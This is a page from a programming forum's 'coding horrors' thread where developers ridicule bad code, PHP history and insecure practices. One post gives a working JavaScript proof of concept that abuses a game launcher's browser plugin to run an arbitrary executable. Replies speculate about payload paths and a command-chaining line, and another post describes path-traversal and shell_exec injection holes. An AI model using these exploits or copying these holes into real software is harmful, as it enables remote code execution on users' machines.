Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Vanadium
Jan 8, 2005

You might have been thinking of perl 6 :)

Adbot
ADBOT LOVES YOU

Frozen Peach
Aug 25, 2004

garbage man from a garbage can
PHP6 got dropped, and they decided instead of making a full version update, to roll the "featured" changes PHP6 was going to have into smaller portions. PHP6 basically became PHP 5.3 and 5.4. There are still a few features that have been discussed and planned for 6 that we haven't seen yet though.

raminasi
Jan 25, 2005

a last drink with no ice
But it's not like the PHP devs are exactly jonesing for a total overhaul of their language, is it? Isn't the guiding development philosophy "'Real' programmers are idiots?"

Zamujasa
Oct 27, 2010

Bread Liar

GrumpyDoctor posted:

But it's not like the PHP devs are exactly jonesing for a total overhaul of their language, is it? Isn't the guiding development philosophy "'Real' programmers are idiots?"

I think that was only the original designer of the language, not the current team. I could be wrong, though.

tef
May 30, 2004

-> some l-system crap ->

Frozen-Solid posted:

PHP6 got dropped, and they decided instead of making a full version update, to roll the "featured" changes PHP6 was going to have into smaller portions. PHP6 basically became PHP 5.3 and 5.4. There are still a few features that have been discussed and planned for 6 that we haven't seen yet though.

PHP6 tried to add unicode, and strayed from the true path of UTF-8, and suffered as a result. Unicode support is still missing from PHP.

pokeyman
Nov 26, 2006

That elephant ate my entire platoon.
Haha wait, what? Where can I read more about PHP not handling unicode? This is awesome.

A A 2 3 5 8 K
Nov 24, 2003
Illiteracy... what does that word even mean?

pokeyman posted:

Haha wait, what? Where can I read more about PHP not handling unicode? This is awesome.

It's more awesome than you think: http://pooteeweet.org/blog/1689

HappyHippo
Nov 19, 2003
Do you have an Air Miles Card?

Golbez posted:

I am probably missing something here, but why the hell would this return "unexpected results" because of a large file? It can't see if that file exists if it's more than 2gb? What unexpected results would we have? Returning false if the file is actually there? Is this actually a thing that happens?

I like to think that PHP tries to open and read the whole file just to determine if it exists and is readable, but fails if it can't load all the contents into memory.

Plorkyeran
Mar 22, 2007

To Escape The Shackles Of The Old Forums, We Must Reject The Tribal Negativity He Endorsed

Zamujasa posted:

I think that was only the original designer of the language, not the current team. I could be wrong, though.
Rasmus is still pretty involved and the Zend guys are not very competent.

McGlockenshire
Dec 16, 2005

GOLLOCKS!

Frozen-Solid posted:

This is basically not true.

You'll want to view Andrei Zmievski's slides, wherein he explains both the PHP6 unicode conundrum and why full unicode support will basically never happen. Hint: it destroys backwards compatibly in both obvious and subtle ways.

PHP 6 was never slated to have any of the features we've gotten in 5.3 and 5.4, and will get in the next release. People basically got pissed off at the autocracy that was php-internals and managed to push through an RFC process. It's only through the RFC process and a modern managed release cycle that there's been any progress on making PHP a better language. Even then...

Frozen Peach
Aug 25, 2004

garbage man from a garbage can

McGlockenshire posted:

PHP 6 was never slated to have any of the features we've gotten in 5.3 and 5.4, and will get in the next release. People basically got pissed off at the autocracy that was php-internals and managed to push through an RFC process.

That isn't entirely true either. The last time I heard about PHP6 was in early '09, before the death of PHP6. At that point in time namespaces, closures, and goto were all intended to be included in PHP6. The first patches for namespaces were all done as a part of PHP6. There were also a lot of things that were being talked about that were going to be looked into after PHP6 was finished.

For example: http://www.nullislove.com/2007/07/06/php-6-namespaces/

All of this was long before the death of PHP6, and before work had begun on PHP 5.3. Even in May 2008, (The PHP|Tek 2008 Conference, which I attended) those features were still planned for PHP6. By Summer of 2008, those features were back ported into PHP 5 and turned into PHP 5.3 alpha 1, which was released in August 2008.

You are correct in that by the time Andrei Zmievski's slideshow that you linked was made, the only part of PHP6 that was different was unicode support. It was officially killed in 2010, when work on PHP5.4 began, as mentioned in his slideshow.

DrankSinatra
Aug 25, 2011
//Get the number of items in the array list
item_count = myArrayList.ToArray().length;

Jesus gently caress. Why is this happening to me? Why is this in production code?

PrBacterio
Jul 19, 2000

DrankSinatra posted:

//Get the number of items in the array list
item_count = myArrayList.ToArray().length;

Jesus gently caress. Why is this happening to me? Why is this in production code?
Eh. You know in comparison to some of the horrors in this thread this one is so utterly trivial that I can't really get worked up over it. And it's so easily fixed too. A real horror is when its some dumb poo poo repeated over dozens or hundreds of functions, with subtle changes in each instance and so intrinsically entwined with the inner workings of the program that it can't be easily ripped out and fixed without breaking the whole thing.

DrankSinatra
Aug 25, 2011

PrBacterio posted:

Eh. You know in comparison to some of the horrors in this thread this one is so utterly trivial that I can't really get worked up over it. And it's so easily fixed too. A real horror is when its some dumb poo poo repeated over dozens or hundreds of functions, with subtle changes in each instance and so intrinsically entwined with the inner workings of the program that it can't be easily ripped out and fixed without breaking the whole thing.

That's true. I'm basically in the middle of rewriting everything he's done. There's nothing subtly wrong. It's just thousands of lines of poo poo that nobody out of CS100 would have thought was a reasonable idea.

"Oh you want me to convert this base64 string back to a byte array? Ok. I'll cast it to byte[]."
It's just hundreds of trivial things that might possibly look okay at the surface level, but make no sense at all when you give them more than thirty seconds of thought.

Janitor Prime
Jan 22, 2004

PC LOAD LETTER

What da fuck does that mean

Fun Shoe

DrankSinatra posted:

"Oh you want me to convert this base64 string back to a byte array? Ok. I'll cast it to byte[]."

:allears: baby's first serialization

Zamujasa
Oct 27, 2010

Bread Liar

PrBacterio posted:

A real horror is when its some dumb poo poo repeated over dozens or hundreds of functions, with subtle changes in each instance and so intrinsically entwined with the inner workings of the program that it can't be easily ripped out and fixed without breaking the whole thing.

Haha, at least your poo poo is in functions! :downs:

trex eaterofcadrs
Jun 17, 2005
My lack of understanding is only exceeded by my lack of concern.

Zamujasa posted:

Haha, at least your poo poo is in functions! :downs:

Every time I've worked with off-shored, lowest-bidder code I've run into the 4000+ line monolithic function that invariably 'dispatches' by switch statement.

Zamujasa
Oct 27, 2010

Bread Liar
We have that too, but instead of a function it's buried in an Ajax request that fires off a file_get_contents("http://magic_url_to_our_api"), which collapses through about 10 nested if ($validated = 1) {, which eventually falls into a two-case switch statement.

Inside that statement is code that is really great, like this:

code:
$q = query("SELECT name, use2 FROM boxes WHERE use2 = 0");
while($row = fetch($q)) {
  $box = $row;
}

if (!$box) {
  $q = query("SELECT name, use2 FROM boxes WHERE use2 = 0");
  while($row = fetch($q)) {
    $box = $row;
  }
}
// Repeat this about 5 more times with a different number...
...of which there are about 4 copies of this file (possibly 5) depending on which vector you're using to actually access our webpage. PC, iPhone, Android, e-mail link, SMS message...

Oh. Another fun thing from Friday. My boss learned about this:
code:
$array[] = $thing; // Add a new element to an array
"If you guys keep teaching me this sort of stuff, I won't keep making horrible code! :downs:"

For the record, the previous way he was doing it was something like this:
code:
$q = query("select * from table where condition");
while ($row = fetch($q)) {
$mystr = ",$row[data]";
}

/* literally over 400 lines of completely unrelated code here */

$datas = explode(",", $mystr);
foreach ($datas as $data) {
shell_exec("php /var/dosomething.php $data");
}

Malloc Voidstar
May 7, 2007

Fuck the cowboys. Unf. Fuck em hard.
does this qualify

as far as I can tell, the Flash installer creates a local webserver in order to serve javascript to itself, which is displaying its UI using IE's rendering/JS engine. Their JS has an error, causing the installer to fail (but first it overwrites enough so that the outdated version is now broken)

that awful man
Feb 18, 2007

YOSPOS, bitch

Aleksei Vasiliev posted:

does this qualify

as far as I can tell, the Flash installer creates a local webserver in order to serve javascript to itself, which is displaying its UI using IE's rendering/JS engine. Their JS has an error, causing the installer to fail (but first it overwrites enough so that the outdated version is now broken)

Yes, anything made by Adobe always qualifies.

Threep
Apr 1, 2006

It's kind of a long story.
Here's a "fun" coding horror: Most recent Ubisoft games install a remote execution exploit as a browser plugin. Here's a POC that runs calc.exe:

JavaScript code:
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
At least the plugin is easily disabled.

e: http://pastehtml.com/view/c6gxl1a79.html hosted version if you want to try it out

Threep fucked around with this message at 11:15 on Jul 30, 2012

Jabor
Jul 16, 2010

#1 Loser at SpaceChem
The exploit is literally just handing the plugin a base64 encoded path to whatever file you want to execute.

This is a bigger :wtf: than Super Meat Boy.

Malloc Voidstar
May 7, 2007

Can that actually be used to do anything malicious like 'download and run this trojan'? Real question.

Also, just tested using UPlay installed from their site. Doesn't work on Win 7 x64 in any browser (IE/Chrome/FF). But they may distribute a different version with their games; it didn't install a browser plugin.

edit, unrelated: How not to reassure people over a security issue

Malloc Voidstar fucked around with this message at 11:33 on Jul 30, 2012

Threep
Apr 1, 2006

It's kind of a long story.

Aleksei Vasiliev posted:

Can that actually be used to do anything malicious like 'download and run this trojan'? Real question.
I haven't tested it but in theory you could enter a path like \\some-ip-in-china\kit\malwaredownloader.exe. And of course if there's a way to add command line arguments then it's open season, and it would make sense to have such for a product launcher.

Threep fucked around with this message at 11:27 on Jul 30, 2012

Tamba
Apr 5, 2010

It could also execute
echo "malicious code">somefile.exe&&somefile.exe

nielsm
Jun 1, 2009

Tamba posted:

It could also execute
echo "malicious code">somefile.exe&&somefile.exe

I strongly doubt their launcher actually runs the thing through cmd.exe instead of just plain CreateProcess() or ShellExecute()ing it.

Malloc Voidstar
May 7, 2007

Threep posted:

And of course if there's a way to add command line arguments then it's open season, and it would make sense to have such for a product launcher.
Well "-orbit_arguments" "" shows up in a random log file for the launcher, so maybe that'll do it?

edit: credit to Ubisoft for patching it already. except i think it's outweighed by having it in the first place.

Malloc Voidstar fucked around with this message at 23:36 on Jul 30, 2012

redleader
Aug 18, 2005

Engage according to operational parameters
The correct way to route URLs in ASP.NET is:
(a) use the framework's inbuilt URL routing system,
(b) roll your own routing solution with regexes or whatever,
or
(c) route your URLs with a 700 line stored procedure in your database.

I think we all know which method my work decided to use.

Impotence
Nov 8, 2010
Lipstick Apathy

redleader posted:

The correct way to route URLs in ASP.NET is:
(a) use the framework's inbuilt URL routing system,
(b) roll your own routing solution with regexes or whatever,
or
(c) route your URLs with a 700 line stored procedure in your database.

I think we all know which method my work decided to use.

d) make tons of folders and put a default.aspx in each of them

redleader
Aug 18, 2005

Engage according to operational parameters

Biowarfare posted:

d) make tons of folders and put a default.aspx in each of them

Oh man, I wish I'd thought of this.

Zamujasa
Oct 27, 2010

Bread Liar
A new day, a new horror... If I'm becoming grating with Tales from The Boss, then let me know and I'll cut back on sharing them.

Buried deep* in the code for Android devices** there was a hardcoded URL to "http://oursite.com/readfile.php?file=super_cool_video.mp4", presumably to test our video player. Well, you can probably figure out what that file does. Here's a hint: It definitely does not do any sort of validation or sanity check. "file=../../secure_file.php? Sure! :downs:"

Of course, they stressed to the new hire that we're a very serious and secure company! :cripes:

I think my favorite part was that this could've been solved by a) not using totally separate folders for http and https, b) using a symlink, or c) a rewrite rule in Apache. But instead he takes the most insecure path, completely missing the point. (Then again: This is the same person who thinks naming folders stupid names like "upload834713" is at all "secure".)

* My boss is apparently very proud that this entire mobile app is contained in a single .php file, with a lot of (of course completely run-together) HTML segments in if-then-else. The whole mess is over a thousand lines long for what should be almost nothing but a few include()s.

** Yes, we do all of our browser checking based on the user-agent string (and even then, half-assedly). Media queries? Pfft! Capability checking? Ha!

Maluco Marinero
Jan 18, 2001

Damn that's a
fine elephant.
Holy cow. I'm sitting here having just deployed my Django site worried about pretty much everything cause I'm no that good but god drat that's crazy bad.

bobthecheese
Jun 7, 2006
Although I've never met Martha Stewart, I'll probably never birth her child.

Zamujasa posted:

Of course, they stressed to the new hire that we're a very serious and secure company! :cripes:

Do you work for Tesco UK? Apparently saying "We're serious about security and our measures are robust" is the same thing as actually having robust security measures.

TMYK

Novo
May 13, 2003

Stercorem pro cerebro habes
Soiled Meat

Zamujasa posted:

I've actually seen the following sentences back to back in a job ad: "We take security VERY seriously. All our code runs in the cloud."

Zamujasa
Oct 27, 2010

Bread Liar

Novo posted:

I've actually seen the following sentences back to back in a job ad: "We take security VERY seriously. All our code runs in the cloud."

That sounds like us. :rolleyes: Everyone throws around "cloud" and such like they know what they're talking about.

Cocoa Crispies
Jul 20, 2001

Vehicular Manslaughter!

Pillbug

BP posted:

True. I guess you can use a file existence check as a way to short-circuit unnecessary code--ie skip doing processing that will eventually fail due to a missing file, rather than waiting until you actually need the file before failing. But you should always also check at time of open.
In Ruby Rack environments like Passenger and Pow, APP_ROOT/tmp/restart.txt is used to control restarting the app. If it exists and has a modification time more recent than the currently running instance, the app server is restarted. This requires both an existence check and a status check, but not actually opening the file.

Suspicious Dish
Sep 24, 2011

2020 is the year of linux on the desktop, bro
Fun Shoe
But what if the file is deleted in between the existence check and the stat()???

Plorkyeran
Mar 22, 2007

To Escape The Shackles Of The Old Forums, We Must Reject The Tribal Negativity He Endorsed
Then stat will fail, which is a case that needs to be handled anyway, so the file existence check before the stat is pointless.

Cocoa Crispies
Jul 20, 2001

Vehicular Manslaughter!

Pillbug

Suspicious Dish posted:

But what if the file is deleted in between the existence check and the stat()???
So maybe it only calls stat, go read the source I guess!

Adbot
ADBOT LOVES YOU

ahmini
May 5, 2009

Zamujasa posted:

(Then again: This is the same person who thinks naming folders stupid names like "upload834713" is at all "secure".)

"Security through obscurity" is the phrase that springs to mind.